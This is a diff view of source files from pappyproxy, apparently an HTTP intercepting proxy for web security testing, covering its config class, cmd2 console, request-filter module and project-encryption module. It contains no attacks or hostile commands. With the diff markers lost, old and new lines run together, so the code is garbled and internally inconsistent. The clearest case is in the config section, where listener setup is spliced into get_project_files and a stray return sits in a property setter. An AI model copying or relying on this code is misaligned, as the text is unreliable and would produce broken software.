:Default: ``['{DATA_DIR}/plugins', '{PAPPY_DIR}/plugins']``
class ProxyConfig:
.. data:: save_history
Whether command history should be saved to a file/loaded at startup.
:Default: True
.. data:: config_dict
The dictionary read from config.json. When writing plugins, use this to load
configuration options for your plugin.
.. data:: global_config_dict
The dictionary from ~/.pappy/global_config.json. It contains settings for
Pappy that are specific to the current computer. Avoid putting settings here,
especially if it involves specific projects.
.. data:: archive
Project archive compressed as a ``tar.bz2`` archive if libraries available on the system,
otherwise falls back to zip archive.
:Default: ``project.archive``
.. data:: crypt_dir
Temporary working directory to unpack an encrypted project archive. Directory
will contain copies of normal startup files, e.g. conifg.json, cmdhistory, etc.
On exiting pappy, entire directory will be compressed into an archive and encrypted.
Compressed as a tar.bz2 archive if libraries available on the system,
otherwise falls back to zip.
:Default: ``crypt``
.. data:: crypt_file
Encrypted archive of the temporary working directory ``crypt_dir``. Compressed as a
tar.bz2 archive if libraries available on the system, otherwise falls back to zip.
:Default: ``project.crypt``
.. data:: crypt_session
Boolean variable to determine whether pappy started in crypto mode
:Default: False
.. data:: salt_len
Length of the nonce-salt value appended to the end of `crypt_file`
:Default: 16
"""
def __init__(self):
self.pappy_dir = os.path.dirname(os.path.realpath(__file__))
self.data_dir = os.path.join(os.path.expanduser('~'), '.pappy')
self.cert_dir = os.path.join(self.data_dir, 'certs')
self.datafile = 'data.db'
self.debug_dir = None
self.debug_to_file = False
self.debug_verbosity = 0
self.listeners = []
self.socks_proxy = None
self.http_proxy = None
self.ssl_ca_file = 'certificate.crt'
self.ssl_pkey_file = 'private.key'
self.histsize = 1000
self.plugin_dirs = [os.path.join(self.data_dir, 'plugins'), os.path.join(self.pappy_dir, 'plugins')]
self.config_dict = {}
self.global_config_dict = {}
self.archive = 'project.archive'
self.debug = False
self.crypt_dir = 'crypt'
self.crypt_file = 'project.crypt'
self.crypt_session = False
self.salt_len = 16
def get_default_config(self):
default_config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'default_user_config.json')
with open(default_config_file) as f:
settings = json.load(f)
return settings
def get_project_files(self):
file_glob = glob.glob('*')
pp = os.getcwd() + os.sep
project_files = [pp+f for f in file_glob if os.path.isfile(pp+f)]
self._listeners = [('127.0.0.1', 8080, None)]
self._proxy = {'use_proxy': False, 'host': '', 'port': 0, 'is_socks': False}
if self.crypt_file in project_files:
project_files.remove(self.crypt_file)
def load(self, fname):
try:
with open(fname, 'r') as f:
config_info = json.loads(f.read())
except IOError:
config_info = json.loads(default_config)
with open(fname, 'w') as f:
f.write(default_config)
# Listeners
if 'listeners' in config_info:
self._parse_listeners(config_info['listeners'])
if 'proxy' in config_info:
self._proxy = config_info['proxy']
def _parse_listeners(self, listeners):
self._listeners = []
for info in listeners:
if 'port' in info:
port = info['port']
else:
port = 8080
if 'interface' in info:
iface = info['interface']
elif 'iface' in info:
iface = info['iface']
else:
iface = '127.0.0.1'
if "transparent" in info:
trans_info = info['transparent']
transparent_dest = (trans_info.get('host', ""),
trans_info.get('port', 0),
trans_info.get('use_tls', False))
else:
transparent_dest = None
self._listeners.append((iface, port, transparent_dest))
@property
def listeners(self):
return copy.deepcopy(self._listeners)
@listeners.setter
def listeners(self, val):
self._parse_listeners(val)
return project_files
@property
def proxy(self):
# don't use this, use the getters to get the parsed values
return self._proxy
@proxy.setter
def proxy(self, val):
self._proxy = val
@property
def use_proxy(self):
if self._proxy is None:
return False
if 'use_proxy' in self._proxy:
if self._proxy['use_proxy']:
return True
return False
@property
def proxy_host(self):
if self._proxy is None:
return ''
if 'host' in self._proxy:
return self._proxy['host']
return ''
@property
def proxy_port(self):
if self._proxy is None:
return ''
if 'port' in self._proxy:
return self._proxy['port']
return ''
@property
def proxy_username(self):
if self._proxy is None:
return ''
if 'username' in self._proxy:
return self._proxy['username']
return ''
@property
def proxy_password(self):
if self._proxy is None:
return ''
if 'password' in self._proxy:
return self._proxy['password']
return ''
@property
def use_proxy_creds(self):
return ('username' in self._proxy or 'password' in self._proxy)
@property
def is_socks_proxy(self):
if self._proxy is None:
return False
if 'is_socks' in self._proxy:
if self._proxy['is_socks']:
return True
return False
@staticmethod
def _parse_proxy_login(conf):
proxy = {}
if 'host' in conf and 'port' in conf:
proxy = {}
proxy['host'] = conf['host'].encode('utf-8')
proxy['port'] = conf['port']
if 'username' in conf:
if 'password' in conf:
proxy['username'] = conf['username'].encode('utf-8')
proxy['password'] = conf['password'].encode('utf-8')
else:
print 'Proxy has a username but no password. Ignoring creds.'
else:
print 'Host is missing host/port.'
return None
return proxy
def load_settings(self, proj_config):
# Substitution dictionary
subs = {}
subs['PAPPYDIR'] = self.pappy_dir
subs['DATADIR'] = self.data_dir
# Data file settings
if 'data_file' in proj_config:
self.datafile = proj_config["data_file"].format(**subs)
# Debug settings
if 'debug_dir' in proj_config:
if proj_config['debug_dir']:
self.debug_to_file = True
self.debug_dir = proj_config["debug_dir"].format(**subs)
# Cert directory settings
if 'cert_dir' in proj_config:
self.cert_dir = proj_config["cert_dir"].format(**subs)
# Listener settings
if "proxy_listeners" in proj_config:
self.listeners = []
for l in proj_config["proxy_listeners"]:
if 'forward_host_ssl' in l:
l['forward_host_ssl'] = l['forward_host_ssl'].encode('utf-8')
if 'forward_host' in l:
l['forward_host'] = l['forward_host'].encode('utf-8')
self.listeners.append(l)
# SOCKS proxy settings
self.socks_proxy = None
if "socks_proxy" in proj_config:
if proj_config['socks_proxy'] is not None:
self.socks_proxy = PappyConfig._parse_proxy_login(proj_config['socks_proxy'])
# HTTP proxy settings
self.http_proxy = None
if "http_proxy" in proj_config:
if proj_config['http_proxy'] is not None:
self.http_proxy = PappyConfig._parse_proxy_login(proj_config['http_proxy'])
# History saving settings
if "history_size" in proj_config:
self.histsize = proj_config['history_size']
def load_global_settings(self, global_config):
from .http import Request
if "cache_size" in global_config:
self.cache_size = global_config['cache_size']
else:
self.cache_size = 2000
Request.cache.resize(self.cache_size)
def load_from_file(self, fname):
# Make sure we have a config file
if not os.path.isfile(fname):
print "Copying default config to %s" % fname
default_config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'default_user_config.json')
shutil.copyfile(default_config_file, fname)
# Load local project config
with open(fname, 'r') as f:
self.config_dict = json.load(f)
self.load_settings(self.config_dict)
def global_load_from_file(self):
# Make sure we have a config file
fname = os.path.join(self.data_dir, 'global_config.json')
if not os.path.isfile(fname):
print "Copying default global config to %s" % fname
default_global_config_file = os.path.join(self.pappy_dir,
'default_global_config.json')
shutil.copyfile(default_global_config_file, fname)
# Load local project config
with open(fname, 'r') as f:
self.global_config_dict = json.load(f)
self.load_global_settings(self.global_config_dict)

129
pappyproxy/console.py
Unescape View File

@ -7,50 +7,80 @@ import atexit
import cmd2
import os
import readline
import string
#import string
import shlex
import sys
from .util import PappyException
from .colors import Colors
from .proxy import MessageError
###################
## Helper functions
## Helper Functions
def print_pappy_errors(func):
def print_errors(func):
def catch(*args, **kwargs):
try:
func(*args, **kwargs)
except PappyException as e:
print str(e)
except (CommandError, MessageError) as e:
print(str(e))
return catch
def interface_loop(client):
cons = Cmd(client=client)
load_interface(cons)
sys.argv = []
cons.cmdloop()
def load_interface(cons):
from .interface import test, view, decode, misc, context, mangle, macros, tags
test.load_cmds(cons)
view.load_cmds(cons)
decode.load_cmds(cons)
misc.load_cmds(cons)
context.load_cmds(cons)
mangle.load_cmds(cons)
macros.load_cmds(cons)
tags.load_cmds(cons)
##########
## Classes
class ProxyCmd(cmd2.Cmd):
class SessionEnd(Exception):
pass
class CommandError(Exception):
pass
class Cmd(cmd2.Cmd):
"""
An object representing the console interface. Provides methods to add
commands and aliases to the console.
commands and aliases to the console. Implemented as a hack around cmd2.Cmd
"""
def __init__(self, *args, **kwargs):
# the \x01/\x02 are to make the prompt behave properly with the readline library
self.prompt = 'pappy\x01' + Colors.YELLOW + '\x02> \x01' + Colors.ENDC + '\x02'
self.debug = True
self.session = kwargs['session']
del kwargs['session']
self.histsize = 0
if 'histsize' in kwargs:
self.histsize = kwargs['histsize']
del kwargs['histsize']
if 'client' not in kwargs:
raise Exception("client argument is required")
self.client = kwargs['client']
self.client.console = self
del kwargs['client']
self._cmds = {}
self._aliases = {}
# Only read and save history when not in crypto mode
if not self.session.config.crypt_session:
atexit.register(self.save_histfile)
readline.set_history_length(self.session.config.histsize)
if os.path.exists('cmdhistory'):
if self.session.config.histsize != 0:
readline.read_history_file('cmdhistory')
else:
os.remove('cmdhistory')
atexit.register(self.save_histfile)
readline.set_history_length(self.histsize)
if os.path.exists('cmdhistory'):
if self.histsize != 0:
readline.read_history_file('cmdhistory')
else:
os.remove('cmdhistory')
cmd2.Cmd.__init__(self, *args, **kwargs)
@ -61,8 +91,8 @@ class ProxyCmd(cmd2.Cmd):
ret.update(self.__dict__.keys())
ret.update(['do_'+k for k in self._cmds.keys()])
ret.update(['help_'+k for k in self._cmds.keys()])
ret.update(['complete_'+k for k, v in self._cmds.iteritems() if self._cmds[k][1]])
for k, v in self._aliases.iteritems():
ret.update(['complete_'+k for k, v in self._cmds.items() if self._cmds[k][1]])
for k, v in self._aliases.items():
ret.add('do_' + k)
ret.add('help_' + k)
if self._cmds[self._aliases[k]][1]:
@ -74,23 +104,39 @@ class ProxyCmd(cmd2.Cmd):
def f():
if not func.__doc__:
to_print = 'No help exists for function'
lines = func.__doc__.splitlines()
if len(lines) > 0 and lines[0] == '':
lines = lines[1:]
if len(lines) > 0 and lines[-1] == '':
lines = lines[-1:]
to_print = '\n'.join(string.lstrip(l) for l in lines)
print to_print
else:
lines = func.__doc__.splitlines()
if len(lines) > 0 and lines[0] == '':
lines = lines[1:]
if len(lines) > 0 and lines[-1] == '':
lines = lines[-1:]
to_print = '\n'.join(l.lstrip() for l in lines)
aliases = set()
aliases.add(attr[5:])
for i in range(2):
for k, v in self._aliases.items():
if k in aliases or v in aliases:
aliases.add(k)
aliases.add(v)
to_print += '\nAliases: ' + ', '.join(aliases)
print(to_print)
return f
def gen_dofunc(func, client):
def f(line):
args = shlex.split(line)
func(client, args)
return print_errors(f)
if attr.startswith('do_'):
command = attr[3:]
if command in self._cmds:
return print_pappy_errors(self._cmds[command][0])
return gen_dofunc(self._cmds[command][0], self.client)
elif command in self._aliases:
real_command = self._aliases[command]
if real_command in self._cmds:
return print_pappy_errors(self._cmds[real_command][0])
return gen_dofunc(self._cmds[real_command][0], self.client)
elif attr.startswith('help_'):
command = attr[5:]
if command in self._cmds:
@ -111,13 +157,20 @@ class ProxyCmd(cmd2.Cmd):
return self._cmds[real_command][1]
raise AttributeError(attr)
def run_args(self, args):
command = args[0]
if command in self._cmds:
self._cmds[command][0](self.client, args[1:])
elif command in self._aliases:
real_command = self._aliases[command]
if real_command in self._cmds:
self._cmds[real_command][0](self.client, args[1:])
def save_histfile(self):
# Only write to file if not in crypto mode
if not self.session.config.crypt_session:
# Write the command to the history file
if self.session.config.histsize != 0:
readline.set_history_length(self.session.config.histsize)
readline.write_history_file('cmdhistory')
# Write the command to the history file
if self.histsize != 0:
readline.set_history_length(self.histsize)
readline.write_history_file('cmdhistory')
def get_names(self):
# Hack to get cmd to recognize do_/etc functions as functions for things
@ -136,7 +189,7 @@ class ProxyCmd(cmd2.Cmd):
{'command': (do_func, autocomplete_func)}
Use autocomplete_func=None for no autocomplete function
"""
for command, vals in cmd_dict.iteritems():
for command, vals in cmd_dict.items():
do_func, ac_func = vals
self.set_cmd(command, do_func, ac_func)
@ -145,6 +198,8 @@ class ProxyCmd(cmd2.Cmd):
Add an alias for a command.
ie add_alias("foo", "f") will let you run the 'foo' command with 'f'
"""
if command not in self._cmds:
raise KeyError()
self._aliases[alias] = command
def add_aliases(self, alias_list):

799
pappyproxy/context.py
Unescape View File

@ -1,799 +0,0 @@
import crochet
import re
import shlex
import json
from .http import Request, Response, RepeatableDict
from twisted.internet import defer
from util import PappyException
"""
context.py
Functions and classes involved with managing the current context and filters
"""
scope = []
_BARE_COMPARERS = ('ex','nex')
class Context(object):
"""
A class representing a set of requests that pass a set of filters
:ivar active_filters: Filters that are currently applied to the context
:vartype active_filters: List of functions that takes one :class:`pappyproxy.http.Request` and returns either true or false.
:ivar active_requests: Requests which pass all the filters applied to the context
:type active_requests: Request
:ivar inactive_requests: Requests which do not pass all the filters applied to the context
:type inactive_requests: Request
"""
def __init__(self):
self.active_filters = []
self.complete = True
self.active_requests = []
@staticmethod
def get_memid():
i = 'm%d' % Context._next_in_mem_id
Context._next_in_mem_id += 1
return i
def cache_reset(self):
self.active_requests = []
self.complete = False
def add_filter(self, filt):
"""
Add a filter to the context. This will remove any requests that do not pass
the filter from the ``active_requests`` set.
:param filt: The filter to add
:type filt: Function that takes one :class:`pappyproxy.http.Request` and returns either true or false. (or a :class:`pappyproxy.context.Filter`)
"""
self.active_filters.append(filt)
self.cache_reset()
@defer.inlineCallbacks
def add_filter_string(self, filtstr):
"""
Add a filter to the context by filter string
"""
f = Filter(filtstr)
yield f.generate()
self.add_filter(f)
def filter_up(self):
"""
Removes the last filter that was applied to the context.
"""
# Deletes the last filter of the context
if self.active_filters:
self.active_filters = self.active_filters[:-1]
self.cache_reset()
def set_filters(self, filters):
"""
Set the list of filters for the context.
"""
self.active_filters = filters[:]
self.cache_reset()
@defer.inlineCallbacks
def get_reqs(self, n=-1):
# This is inefficient but I want it to work for now, and as long as we
# don't put the full requests in memory I don't care.
ids = self.active_requests
if (len(ids) >= n and n != -1) or self.complete == True:
if n == -1:
defer.returnValue(ids)
else:
defer.returnValue(ids[:n])
ids = []
for req_d in Request.cache.req_it():
r = yield req_d
passed = True
for filt in self.active_filters:
if not filt(r):
passed = False
break
if passed:
self.active_requests.append(r.reqid)
ids.append(r.reqid)
if len(ids) >= n and n != -1:
defer.returnValue(ids[:n])
self.complete = True
defer.returnValue(ids)
class FilterParseError(PappyException):
pass
def cmp_is(a, b):
if a is None or b is None:
return False
return str(a) == str(b)
def cmp_contains(a, b):
if a is None or b is None:
return False
return (b.lower() in a.lower())
def cmp_exists(a, b=None):
if a is None or b is None:
return False
return (a is not None and a != [])
def cmp_len_eq(a, b):
if a is None or b is None:
return False
return (len(a) == int(b))
def cmp_len_gt(a, b):
if a is None or b is None:
return False
return (len(a) > int(b))
def cmp_len_lt(a, b):
if a is None or b is None:
return False
return (len(a) < int(b))
def cmp_eq(a, b):
if a is None or b is None:
return False
return (int(a) == int(b))
def cmp_gt(a, b):
if a is None or b is None:
return False
return (int(a) > int(b))
def cmp_lt(a, b):
if a is None or b is None:
return False
return (int(a) < int(b))
def cmp_containsr(a, b):
if a is None or b is None:
return False
try:
if re.search(b, a):
return True
return False
except re.error as e:
raise PappyException('Invalid regexp: %s' % e)
def relation_from_text(s, val=''):
# Gets the relation function associated with the string
# Returns none if not found
def negate_func(func):
def f(*args, **kwargs):
return not func(*args, **kwargs)
return f
negate = False
if s[0] == 'n':
negate = True
s = s[1:]
if s in ("is",):
retfunc = cmp_is
elif s in ("contains", "ct"):
retfunc = cmp_contains
elif s in ("containsr", "ctr"):
validate_regexp(val)
retfunc = cmp_containsr
elif s in ("exists", "ex"):
retfunc = cmp_exists
elif s in ("Leq",):
retfunc = cmp_len_eq
elif s in ("Lgt",):
retfunc = cmp_len_gt
elif s in ("Llt",):
retfunc = cmp_len_lt
elif s in ("eq",):
retfunc = cmp_eq
elif s in ("gt",):
retfunc = cmp_gt
elif s in ("lt",):
retfunc = cmp_lt
else:
raise FilterParseError("Invalid relation: %s" % s)
if negate:
return negate_func(retfunc)
else:
return retfunc
def compval_from_args(args):
"""
NOINDEX
returns a function that compares to a value from text.
ie compval_from_text('ct foo') will return a function that returns true
if the passed in string contains foo.
"""
if len(args) == 0:
raise PappyException('Invalid number of arguments')
if args[0] in _BARE_COMPARERS:
if len(args) != 1:
raise PappyException('Invalid number of arguments')
comparer = relation_from_text(args[0], None)
value = None
else:
if len(args) != 2:
raise PappyException('Invalid number of arguments')
comparer = relation_from_text(args[0], args[1])
value = args[1]
def retfunc(s):
return comparer(s, value)
return retfunc
def compval_from_args_repdict(args):
"""
NOINDEX
Similar to compval_from_args but checks a repeatable dict with up to 2
comparers and values.
"""
if len(args) == 0:
raise PappyException('Invalid number of arguments')
nextargs = args[:]
value = None
if args[0] in _BARE_COMPARERS:
comparer = relation_from_text(args[0], None)
if len(args) > 1:
nextargs = args[1:]
else:
if len(args) == 1:
raise PappyException('Invalid number of arguments')
comparer = relation_from_text(args[0], args[1])
value = args[1]
nextargs = args[2:]
comparer2 = None
value2 = None
if nextargs:
if nextargs[0] in _BARE_COMPARERS:
comparer2 = relation_from_text(nextargs[0], None)
else:
if len(nextargs) == 1:
raise PappyException('Invalid number of arguments')
comparer2 = relation_from_text(nextargs[0], nextargs[1])
value2 = nextargs[1]
def retfunc(d):
for k, v in d.all_pairs():
if comparer2 is None:
if comparer(k, value) or comparer(v, value):
return True
else:
if comparer(k, value) and comparer2(v, value2):
return True
return False
return retfunc
def gen_filter_by_all(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
return compval(req.full_message) and ((not req.response) or compval(req.response.full_message))
else:
return compval(req.full_message) or (req.response and compval(req.response.full_message))
return f
def gen_filter_by_host(args):
compval = compval_from_args(args)
def f(req):
return compval(req.host)
return f
def gen_filter_by_body(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
return compval(req.body) and ((not req.response) or compval(req.response.body))
else:
return compval(req.body) or (req.response and compval(req.response.body))
return f
def gen_filter_by_req_body(args):
compval = compval_from_args(args)
def f(req):
return compval(req.body)
return f
def gen_filter_by_rsp_body(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
return (not req.response) or compval(req.response.body)
else:
return req.response and compval(req.response.body)
return f
def gen_filter_by_raw_headers(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
# compval already negates comparison
return compval(req.headers_section) and ((not req.response) or compval(req.response.headers_section))
else:
return compval(req.headers_section) or (req.response and compval(req.response.headers_section))
return f
def gen_filter_by_response_code(args):
compval_from_args(args) # try and throw an error
def f(req):
if not req.response:
return False
compval = compval_from_args(args)
return compval(req.response.response_code)
return f
def gen_filter_by_path(args):
compval = compval_from_args(args)
def f(req):
return compval(req.path)
return f
def gen_filter_by_responsetime(args):
compval = compval_from_args(args)
def f(req):
return compval(req.rsptime)
return f
def gen_filter_by_verb(args):
compval = compval_from_args(args)
def f(req):
return compval(req.verb)
return f
def gen_filter_by_tag(args):
compval = compval_from_args(args)
def f(req):
for tag in req.tags:
if compval(tag):
return True
return False
return f
def gen_filter_by_saved(args):
if len(args) != 0:
raise PappyException('Invalid number of arguments')
def f(req):
if req.saved:
return True
else:
return False
return f
@defer.inlineCallbacks
def gen_filter_by_before(args):
if len(args) != 1:
raise PappyException('Invalid number of arguments')
r = yield Request.load_request(args[0])
def f(req):
if req.time_start is None:
return False
if r.time_start is None:
return False
return req.time_start <= r.time_start
defer.returnValue(f)
@defer.inlineCallbacks
def gen_filter_by_after(args, negate=False):
if len(args) != 1:
raise PappyException('Invalid number of arguments')
r = yield Request.load_request(args[0])
def f(req):
if req.time_start is None:
return False
if r.time_start is None:
return False
return req.time_start >= r.time_start
defer.returnValue(f)
def gen_filter_by_headers(args):
comparer = compval_from_args_repdict(args)
def f(req):
if args[0][0] == 'n':
return comparer(req.headers) and ((not req.response) or comparer(req.response.headers))
else:
return comparer(req.headers) or (req.response and comparer(req.response.headers))
return f
def gen_filter_by_request_headers(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.headers)
return f
def gen_filter_by_response_headers(args):
comparer = compval_from_args_repdict(args)
def f(req):
if args[0][0] == 'n':
return (not req.response) or comparer(req.response.headers)
else:
return req.response and comparer(req.response.headers)
return f
def gen_filter_by_submitted_cookies(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.cookies)
return f
def gen_filter_by_set_cookies(args):
comparer = compval_from_args_repdict(args)
def f(req):
if not req.response:
return False
checkdict = RepeatableDict()
for k, v in req.response.cookies.all_pairs():
checkdict[k] = v.cookie_str
return comparer(checkdict)
return f
def gen_filter_by_url_params(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.url_params)
return f
def gen_filter_by_post_params(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.post_params)
return f
def gen_filter_by_params(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.url_params) or comparer(req.post_params)
return f
@defer.inlineCallbacks
def gen_filter_by_inverse(args):
filt = yield Filter.from_filter_string(parsed_args=args)
def f(req):
return not filt(req)
defer.returnValue(f)
def gen_filter_by_websocket(args):
def f(req):
if not req.response:
return False
if Response.is_ws_upgrade(req.response):
return True
return False
return f
@defer.inlineCallbacks
def filter_reqs(reqids, filters):
to_delete = set()
# Could definitely be more efficient, but it stays like this until
# it impacts performance
requests = []
for reqid in reqids:
r = yield Request.load_request(reqid)
requests.append(r)
for req in requests:
for filt in filters:
if not filt(req):
to_delete.add(req)
retreqs = []
retdel = []
for r in requests:
if r in to_delete:
retdel.append(r.reqid)
else:
retreqs.append(r.reqid)
defer.returnValue((retreqs, retdel))
def passes_filters(request, filters):
for filt in filters:
if not filt(request):
return False
return True
def in_scope(request):
global scope
passes = passes_filters(request, scope)
return passes
def set_scope(filters):
global scope
scope = filters
def save_scope(context):
global scope
scope = context.active_filters[:]
def reset_to_scope(context):
global scope
context.active_filters = scope[:]
context.cache_reset()
def print_scope():
global scope
for f in scope:
print f.filter_string
@defer.inlineCallbacks
def store_scope(dbpool):
# Delete the old scope
yield dbpool.runQuery(
"""
DELETE FROM scope
"""
);
# Insert the new scope
i = 0
for f in scope:
yield dbpool.runQuery(
"""
INSERT INTO scope (filter_order, filter_string) VALUES (?, ?);
""",
(i, f.filter_string)
);
i += 1
@defer.inlineCallbacks
def load_scope(dbpool):
global scope
rows = yield dbpool.runQuery(
"""
SELECT filter_order, filter_string FROM scope;
""",
)
rows = sorted(rows, key=lambda r: int(r[0]))
new_scope = []
for row in rows:
new_filter = Filter(row[1])
yield new_filter.generate()
new_scope.append(new_filter)
scope = new_scope
@defer.inlineCallbacks
def clear_tag(tag):
# Remove a tag from every request
reqs = yield Request.cache.load_by_tag(tag)
for req in reqs:
req.tags.discard(tag)
if req.saved:
yield req.async_save()
reset_context_caches()
@defer.inlineCallbacks
def async_set_tag(tag, reqs):
"""
async_set_tag(tag, reqs)
Remove the tag from every request then add the given requests to memory and
give them the tag. The async version.
:param tag: The tag to set
:type tag: String
:param reqs: The requests to assign to the tag
:type reqs: List of Requests
"""
yield clear_tag(tag)
for req in reqs:
req.tags.add(tag)
Request.cache.add(req)
reset_context_caches()
@defer.inlineCallbacks
def save_context(name, filter_strings, dbpool):
"""
Saves the filter strings to the datafile using their name
"""
rows = yield dbpool.runQuery(
"""
SELECT id FROM saved_contexts WHERE context_name=?;
""", (name,)
)
list_str = json.dumps(filter_strings)
if len(rows) > 0:
yield dbpool.runQuery(
"""
UPDATE saved_contexts SET filter_strings=?
WHERE context_name=?;
""", (list_str, name)
)
else:
yield dbpool.runQuery(
"""
INSERT INTO saved_contexts (context_name, filter_strings)
VALUES (?,?);
""", (name, list_str)
)
@defer.inlineCallbacks
def delete_saved_context(name, dbpool):
yield dbpool.runQuery(
"""
DELETE FROM saved_contexts WHERE context_name=?;
""", (name,)
)
@defer.inlineCallbacks
def get_saved_context(name, dbpool):
rows = yield dbpool.runQuery(
"""
SELECT filter_strings FROM saved_contexts WHERE context_name=?;
""", (name,)
)
if len(rows) == 0:
raise PappyException("Saved context with name %s does not exist" % name)
filter_strs = json.loads(rows[0][0])
defer.returnValue(filter_strs)
@defer.inlineCallbacks
def get_all_saved_contexts(dbpool):
rows = yield dbpool.runQuery(
"""
SELECT context_name, filter_strings FROM saved_contexts;
""",
)
all_strs = {}
for row in rows:
all_strs[row[0]] = json.loads(row[1])
defer.returnValue(all_strs)
@crochet.wait_for(timeout=180.0)
@defer.inlineCallbacks
def set_tag(tag, reqs):
"""
set_tag(tag, reqs)
Remove the tag from every request then add the given requests to memory and
give them the tag. The non-async version.
:param tag: The tag to set
:type tag: String
:param reqs: The requests to assign to the tag
:type reqs: List of Requests
"""
yield async_set_tag(tag, reqs)
def validate_regexp(r):
try:
re.compile(r)
except re.error as e:
raise PappyException('Invalid regexp: %s' % e)
def reset_context_caches():
import pappyproxy.pappy
for c in pappyproxy.pappy.all_contexts:
c.cache_reset()
class Filter(object):
"""
A class representing a filter. Its claim to fame is that you can use
:func:`pappyproxy.context.Filter.from_filter_string` to generate a
filter from a filter string.
"""
_filter_functions = {
"all": gen_filter_by_all,
"host": gen_filter_by_host,
"domain": gen_filter_by_host,
"hs": gen_filter_by_host,
"dm": gen_filter_by_host,
"path": gen_filter_by_path,
"pt": gen_filter_by_path,
"body": gen_filter_by_body,
"bd": gen_filter_by_body,
"data": gen_filter_by_body,
"dt": gen_filter_by_body,
"reqbody": gen_filter_by_req_body,
"qbd": gen_filter_by_req_body,
"reqdata": gen_filter_by_req_body,
"qdt": gen_filter_by_req_body,
"rspbody": gen_filter_by_rsp_body,
"sbd": gen_filter_by_rsp_body,
"qspdata": gen_filter_by_rsp_body,
"sdt": gen_filter_by_rsp_body,
"verb": gen_filter_by_verb,
"vb": gen_filter_by_verb,
"param": gen_filter_by_params,
"pm": gen_filter_by_params,
"header": gen_filter_by_headers,
"hd": gen_filter_by_headers,
"reqheader": gen_filter_by_request_headers,
"qhd": gen_filter_by_request_headers,
"rspheader": gen_filter_by_response_headers,
"shd": gen_filter_by_response_headers,
"rawheaders": gen_filter_by_raw_headers,
"rh": gen_filter_by_raw_headers,
"sentcookie": gen_filter_by_submitted_cookies,
"sck": gen_filter_by_submitted_cookies,
"setcookie": gen_filter_by_set_cookies,
"stck": gen_filter_by_set_cookies,
"statuscode": gen_filter_by_response_code,
"sc": gen_filter_by_response_code,
"responsecode": gen_filter_by_response_code,
"tag": gen_filter_by_tag,
"tg": gen_filter_by_tag,
"saved": gen_filter_by_saved,
"svd": gen_filter_by_saved,
"websocket": gen_filter_by_websocket,
"ws": gen_filter_by_websocket,
}
_async_filter_functions = {
"before": gen_filter_by_before,
"b4": gen_filter_by_before,
"bf": gen_filter_by_before,
"after": gen_filter_by_after,
"af": gen_filter_by_after,
"inv": gen_filter_by_inverse,
}
def __init__(self, filter_string):
self.filter_string = filter_string
def __call__(self, *args, **kwargs):
return self.filter_func(*args, **kwargs)
def __repr__(self):
return '<Filter "%s">' % self.filter_string
@defer.inlineCallbacks
def generate(self):
self.filter_func = yield self.from_filter_string(self.filter_string)
@staticmethod
@defer.inlineCallbacks
def from_filter_string(filter_string=None, parsed_args=None):
"""
from_filter_string(filter_string)
Create a filter from a filter string. If passed a list of arguments, they
will be used instead of parsing the string.
:rtype: Deferred that returns a :class:`pappyproxy.context.Filter`
"""
if parsed_args is not None:
args = parsed_args
else:
args = shlex.split(filter_string)
if len(args) == 0:
raise PappyException('Field is required')
field = args[0]
new_filter = None
field_args = args[1:]
if field in Filter._filter_functions:
new_filter = Filter._filter_functions[field](field_args)
elif field in Filter._async_filter_functions:
new_filter = yield Filter._async_filter_functions[field](field_args)
else:
raise FilterParseError("%s is not a valid field" % field)
if new_filter is None:
raise FilterParseError("Error creating filter")
defer.returnValue(new_filter)

236
pappyproxy/crypto.py
Unescape View File

@ -1,236 +0,0 @@
#!/usr/bin/env python
import crochet
import getpass
import glob
import os
import pappyproxy
import scrypt
import shutil
import twisted
from . import compress
from .util import PappyException
from base64 import b64encode, b64decode
from cryptography.fernet import Fernet, InvalidToken
from twisted.internet import reactor, defer
class Crypto(object):
def __init__(self, sessconfig):
self.config = sessconfig
self.archive = sessconfig.archive
self.compressor = compress.Compress(sessconfig)
self.key = None
self.password = None
self.salt = None
def encrypt_project(self):
"""
Compress and encrypt the project files,
deleting clear-text files afterwards
"""
# Leave the crypto working directory
if self.config.crypt_dir in os.getcwd():
os.chdir('../')
self.compressor.compress_project()
# Get the password and salt, then derive the key
self.crypto_ramp_up()
# Create project and crypto archive
archive_file = open(self.archive, 'rb')
archive_crypt = open(self.config.crypt_file, 'wb')
try:
# Encrypt the archive read as a bytestring
fern = Fernet(self.key)
crypt_token = fern.encrypt(archive_file.read())
archive_crypt.write(crypt_token)
except InvalidToken as e:
raise PappyException("Error encrypting project: ", e)
return False
archive_file.close()
archive_crypt.close()
# Store the salt for the next decryption
self.create_salt_file()
# Delete clear-text files
self.delete_clear_files()
return True
def decrypt_project(self):
"""
Decrypt and decompress the project files
"""
# Decrypt and decompress the project if crypt_file exists
if os.path.isfile(self.config.crypt_file):
cf = self.config.crypt_file
sl = self.config.salt_len
crl = os.path.getsize(cf) - sl
archive_crypt = open(cf, 'rb').read(crl)
archive_file = open(self.config.archive, 'wb')
retries = 3
while True:
try:
self.crypto_ramp_up()
fern = Fernet(self.key)
archive = fern.decrypt(archive_crypt)
break
except InvalidToken as e:
print "Invalid decryption: ", e
retries -= 1
# Quit pappy if user doesn't retry
# or if all retries exhuasted
if not self.confirm_password_retry() or retries <= 0:
os.remove(self.config.archive)
return False
else:
self.password = None
self.key = None
pass
archive_file.write(archive)
archive_file.close()
self.compressor.decompress_project()
self.delete_crypt_files()
os.chdir(self.config.crypt_dir)
return True
# If project exited before encrypting the working directory
# change to the working directory to resume the session
elif os.path.isdir(self.config.crypt_dir):
os.chdir(self.config.crypt_dir)
return True
# If project hasn't been encrypted before,
# setup crypt working directory
else:
os.mkdir(self.config.crypt_dir)
project_files = self.config.get_project_files()
for pf in project_files:
shutil.copy2(pf, self.config.crypt_dir)
os.chdir(self.config.crypt_dir)
return True
def confirm_password_retry(self):
answer = raw_input("Re-enter your password? (y/n): ").strip()
if answer[0] == "y" or answer[0] == "Y":
return True
else:
return False
def crypto_ramp_up(self):
